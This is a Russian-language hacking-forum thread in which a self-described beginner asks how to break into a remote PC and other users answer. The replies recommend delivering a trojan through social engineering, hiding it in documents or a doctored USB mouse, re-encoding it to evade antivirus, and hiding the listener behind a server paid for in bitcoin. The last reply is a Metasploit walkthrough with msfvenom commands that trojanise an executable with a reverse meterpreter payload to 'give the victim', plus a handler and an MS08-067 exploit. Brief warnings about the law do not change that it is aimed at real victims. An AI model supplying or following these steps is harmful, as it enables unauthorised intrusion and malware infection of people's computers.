Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Взлом удаленного ПК (https://forum.antichat.xyz/showthread.php?t=440585)

NikByte 01.05.2016 21:00

Здрасьте , ачатовцы . Я начинающий и хотел бы спросить с помощью каких средств обычно выполняется взлом удаленного пк ? В гугле nmap описывался как утилита для сканирования пк ,находящихся в локальной сети.

atlas28 01.05.2016 22:22

Цитата:

Сообщение от NikByte
NikByte said:

Здрасьте , ачатовцы . Я начинающий и хотел бы спросить с помощью каких средств обычно выполняется взлом удаленного пк ? В гугле nmap описывался как утилита для сканирования пк ,находящихся в локальной сети.

Что именно ты хочешь получить в итоге? Я так понимаю, проще всего тебе будет начать с трояна, который можно впарить при помощи соц. инженерии.

А nmap'ом ты сможешь просто просканировать порты и узнать, какие сервисы на них висят. Кстати говоря, у большинства пользователей стоят роутеры, и у многих из них на этих роутерах открыта вебморда наружу. Ну ты понимаешь, к чему я веду...

NikByte 01.05.2016 22:35

Цитата:

Сообщение от atlas28
atlas28 said:

Что именно ты хочешь получить в итоге? Я так понимаю, проще всего тебе будет начать с трояна, который можно впарить при помощи соц. инженерии.
А nmap'ом ты сможешь просто просканировать порты и узнать, какие сервисы на них висят. Кстати говоря, у большинства пользователей стоят роутеры, и у многих из них на этих роутерах открыта вебморда наружу. Ну ты понимаешь, к чему я веду...

Я же говорю,я начинающий))Мало ччего понимаю))

spize0r 02.05.2016 15:51

Ок. Я тоже начинающий.

Сначала нужно узнать:

1) Какая система у пользователя стоит. А вдруг там Kali Linux?

2) Какой софт стоит.

3) Внешний ли IP.

Скорее всего придется делать троян. Можешь написать сам на Делфи, но лучше используй Metasploit Framework. Там уже все есть, и трояны там с возможностью миграции в процессы, и в реестре перепрописываются. Это все конечно относиться к Винде. Есть в нем и для Линукс троянов шаблоны, но эти трояны как я лично понял, может ошибаюсь , так поправьте, работают только в софте. Тоесть ты линукс софт заражаешь, потом отправляешь пользователю типа - классная игра, или конки погода, или еще что-то. И только когда она работает, доступ есть.

В любом случае трой этот тебе придется куда-то запихнуть. Например, в .pdf или .doc. В exe - это уже для слишком тупых пользователей.

Отправляешь по почте. И вуаля - тебя блокирует почтовый сервис. Снова идешь назад в MSF и кодируешь троян несколько раз так , чтобы сигнатуры кодитуры не совпадали с уже известными антивиру....

Другая возможность, более правдоподобная в твоем случае - зарази флеху, засунть ее в мышу, пошли по почте чуваку, типа акция какая то. Думаю прокатит в 90% случаев. Главное мышку подороже купи.

В трояне нужно прописать будет обратный IP, на котором будет ждать трояна твой "слушатель". Думаю тебе понятно, что этот IP не должен быть твоим домашним IP. Купи выделенный сервер, заплалати за него биткойнами например, чтобы тебя не посекли..

Вообщем как видишь все стоит денег и временных затрат. В крайнем случае можно нанять специалиста.

NikByte 02.05.2016 16:07

Цитата:

Сообщение от spize0r
spize0r said:

Ок. Я тоже начинающий.
Сначала нужно узнать:
1) Какая система у пользователя стоит. А вдруг там Kali Linux?
2) Какой софт стоит.
3) Внешний ли IP.
Скорее всего придется делать троян. Можешь написать сам на Делфи, но лучше используй Metasploit Framework. Там уже все есть, и трояны там с возможностью миграции в процессы, и в реестре перепрописываются. Это все конечно относиться к Винде. Есть в нем и для Линукс троянов шаблоны, но эти трояны как я лично понял, может ошибаюсь , так поправьте, работают только в софте. Тоесть ты линукс софт заражаешь, потом отправляешь пользователю типа - классная игра, или конки погода, или еще что-то. И только когда она работает, доступ есть.
В любом случае трой этот тебе придется куда-то запихнуть. Например, в .pdf или .doc. В exe - это уже для слишком тупых пользователей.
Отправляешь по почте. И вуаля - тебя блокирует почтовый сервис. Снова идешь назад в MSF и кодируешь троян несколько раз так , чтобы сигнатуры кодитуры не совпадали с уже известными антивиру....
Другая возможность, более правдоподобная в твоем случае - зарази флеху, засунть ее в мышу, пошли по почте чуваку, типа акция какая то. Думаю прокатит в 90% случаев. Главное мышку подороже купи.
В трояне нужно прописать будет обратный IP, на котором будет ждать трояна твой "слушатель". Думаю тебе понятно, что этот IP не должен быть твоим домашним IP. Купи выделенный сервер, заплалати за него биткойнами например, чтобы тебя не посекли..
Вообщем как видишь все стоит денег и временных затрат. В крайнем случае можно нанять специалиста.

Спасибо , буду пробовать )) А как вы до этого дошли ,если не секрет ?)

trolex 02.05.2016 18:23

Цитата:

Сообщение от spize0r
spize0r said:

Другая возможность, более правдоподобная в твоем случае - зарази флеху, засунть ее в мышу, пошли по почте чуваку, типа акция какая то. Думаю прокатит в 90% случаев. Главное мышку подороже купи.

это интересно, конечно, но не понятно как будет работать, что бы и мышь и флэшка вместе заработали туда нужно ещё юсб хаб встроить, но дальше при подключении флэшки выпадет окно, что сделать с данным накопителем, открыть в проводнике, запустить авторан и тд. или я чего то не понимаю или проще сразу флэшку отсылать

spize0r 02.05.2016 22:05

Цитата:

Сообщение от NikByte
NikByte said:

Спасибо , буду пробовать )) А как вы до этого дошли ,если не секрет ?)

на форуме прочитал...

Цитата:

Сообщение от trolex
trolex said:

это интересно, конечно, но не понятно как будет работать, что бы и мышь и флэшка вместе заработали туда нужно ещё юсб хаб встроить, но дальше при подключении флэшки выпадет окно, что сделать с данным накопителем, открыть в проводнике, запустить авторан и тд. или я чего то не понимаю или проще сразу флэшку отсылать

ну я имел ввиду, что нужно взять обычную USB мышку, разобрать, взять флешку зараженную, перепаять ее, чтобы на входе была флешка. мышка понятно работать не будет, но нам ведь нужно, чтобы она один раз только была воткнута. а если троянец был сгенерирован и перекодирован несколько раз, то антивирус врядли его словит, если пользователь что-то заподозрит. а вообще ты прав. если нужно чтобы работала, то лучше тогда опять же потратить деньги и купить псевдо мышь или подобный девайс. Но я надеюсь что это все в целях эксперимента! я крайне вам не рекомендую заниматься такими противозаконными вещами, это уголовно наказуемо!!!

NikByte 03.05.2016 08:16

Цитата:

Сообщение от spize0r
spize0r said:

на форуме прочитал...
ну я имел ввиду, что нужно взять обычную USB мышку, разобрать, взять флешку зараженную, перепаять ее, чтобы на входе была флешка. мышка понятно работать не будет, но нам ведь нужно, чтобы она один раз только была воткнута. а если троянец был сгенерирован и перекодирован несколько раз, то антивирус врядли его словит, если пользователь что-то заподозрит. а вообще ты прав. если нужно чтобы работала, то лучше тогда опять же потратить деньги и купить псевдо мышь или подобный девайс. Но я надеюсь что это все в целях эксперимента! я крайне вам не рекомендую заниматься такими противозаконными вещами, это уголовно наказуемо!!!

Да,это эксперимент) Пытаюсь взломать свой второй комп

Ch3ck 14.10.2016 20:09

Не покупай

ojegard 14.10.2016 20:49

Цитата:

Сообщение от NikByte
NikByte said:

Здрасьте , ачатовцы . Я начинающий и хотел бы спросить с помощью каких средств обычно выполняется взлом удаленного пк ? В гугле nmap описывался как утилита для сканирования пк ,находящихся в локальной сети.

Скачай Darkcomet 5.3.2

Shadow Stream 21.11.2016 15:08

Цитата:

Сообщение от NikByte
NikByte said:

Здрасьте , ачатовцы . Я начинающий и хотел бы спросить с помощью каких средств обычно выполняется взлом удаленного пк ? В гугле nmap описывался как утилита для сканирования пк ,находящихся в локальной сети.

[*] Если вы пользуетесь KALI LINUX , то там уже встроен METASPLOIT FRAMEWORK . Советую вам с ним разобраться , очень мощная утилита (написана на Руби).

Инструмент имеет несколько конфигураций:

---------------------------------------------------------------------------------------------------------------------------------

1) Командная оболочка (msfconsole);

2) Веб-интерфейс (Metasploit Community, PRO и Express);

3) Графическая оболочка (Armitage, и более продвинутая версия - Cobalt strike).

--------------------------------------------------------------------------------------------------------------------------------

(Для дистрибутива , где нет сборки для Pentesting )Если у вас все еще нет Метасплоита — не беда, скачать его можно на официальном сайте metasploit.com

Стоит отметить, что msf корректно работает только с базой PostgreSQL.

После того как вы загрузили пакет, откроем консоль и выполним следующее:

1) cd Download/ (перейдем в каталог загрузок);

2) chmod +X metasploit-latest-linux-installer.run (даем права на запуск);

3) sudo ./metasploit-latest-linux-installer.run (запускаем графическую установку).

В качестве краткого описания ознакомимся с основными понятиями, а также рассмотрим некоторые команды MSF.

[*] Exploit— Фрагмент кода, использующий уязвимость в ПО или ОС для выполнения атаки на систему.
[*] Module — Модуль, автоматизирующий процесс какой-либо атаки.
[*] Shellcode — Шеллкод. Используется как полезная нагрузка эксплойта, обеспечивающая доступ к командной оболочке ОС.
[*] Payload — Полезная, или смысловая нагрузка. Это код, который выполняется после успешного выполнения атаки. Видов нагрузки в msf немало.
[*]«Stager» — Нагрузка, разбитая на части. Устанавливая соединение, шелл подгружается полностью.
[*]«Reverse shell» — Бэкконнект шел.
[*]«Meterpreter» — Пожалуй, один из популярных, если не самый популярный шелл. Имеет кучу возможностей: миграцию в процессы; XOR-шифрование, для обхода IDS и антивирусов; два вида dll-инжекции и т.д. Также можно выбрать «metsvc» нагрузку, что зальет и пропишет meterpreter как сервис.

Перед запуском утилиты:

service postgresql start

msfconsole

msf > db_status
[*] postgresql connected to msf3


msf >

msf > msfvenom

Давайте смотреть на некоторые самые важные варианты в этом списке.

================================================== ==================

- p определяет полезный груз Metasploit, который мы хотим использовать.

- e определяет кодирующее устройство, которое мы хотим использовать.

- a определение архитектуры, которую мы хотим использовать (дефолт - x86),

- s определяет максимальный размер полезного груза.

- iопределяю количество повторений, с которыми можно закодировать полезный груз.

- x определяет пользовательский исполняемый файл использовать в качестве шаблона

================================================== =======================

msf > msfvenom -l encoders

msf > msfvenom -p -o

msf >msfvenom -p windows/meterpreter/reverse_tcp -0


msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

- p/windows/meterpreter/reverse_tcp определяет полезный груз, который мы хотим включить

LHOST назначает местного хозяина (ipconfigпропишите)

LPORT определяет порт, на котором мы хотим послушать

- x определяет шаблон, который мы хотим использовать и путь к нему

- e x86/shikata_ga_nai определяет кодирующее устройство, которое мы хотим использовать

- i 200 представляет количество повторений

- f exe -> создать исполняемый файл (.exe)

chess.exe название файла

----------------------------------------------------------------------------------------

msf > use exploit/multi/handler

msf > set PAYLOAD windows/meterpreter/reverse_http

msf > set LHOST 192.168.141.122

msf > set LPORT 4444

msf > exploit


----------------------------------------------------------------------------------------

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe

give victim- отправляем жертве

msf > use exploit/multi/handler

msf > set PAYLOAD windows/meterpreter/reverse_http

msf > set LHOST 192.168.73.128

msf > set LPORT 4444

msf > exploit


-----------------------------------------------------------------------------------------

msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp


Теперь опции также включают опции полезной нагрузки.

Важные опции установить являются LHOST и LPORT.

Немного подробнее:

================================================== ===============================

LHOST - IP-адрес локальной машины или машины хакера.

LPORT - номер порта, на котором обратный слушатель оболочки получит входящую оболочку.


================================================== ================================

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33

msf exploit(ms08_067_netapi) > set LPORT 6666

msf exploit(ms08_067_netapi) > exploit

meterpreter >


meterpreter > sysinfo

meterpreter > ipconfig

meterpreter > run vnc


Ссылки

www.metasploit.com — Официальный сайт Метасплоита

www.offensive-security.com/metasploit-unleashed/Main_Page — Официальная документация по metasploit



Meterpreter


github.com/darkoperator/MSF-Installer — Скрипт автоматической установки metasploit

community.rapid7.com/docs/DOC-2100 — Подробная установка metasploit (linux)

Практикуйте у себя дома на своих компах ! Не забывайте про закон !

Happy Hacking )

Turanchocks_ 21.11.2016 15:14

Цитата:

Сообщение от NikByte
NikByte said:

Спасибо , буду пробовать )) А как вы до этого дошли ,если не секрет ?)

Терпя унижения и насмешки старших бородатых товарищей.


Время: 16:01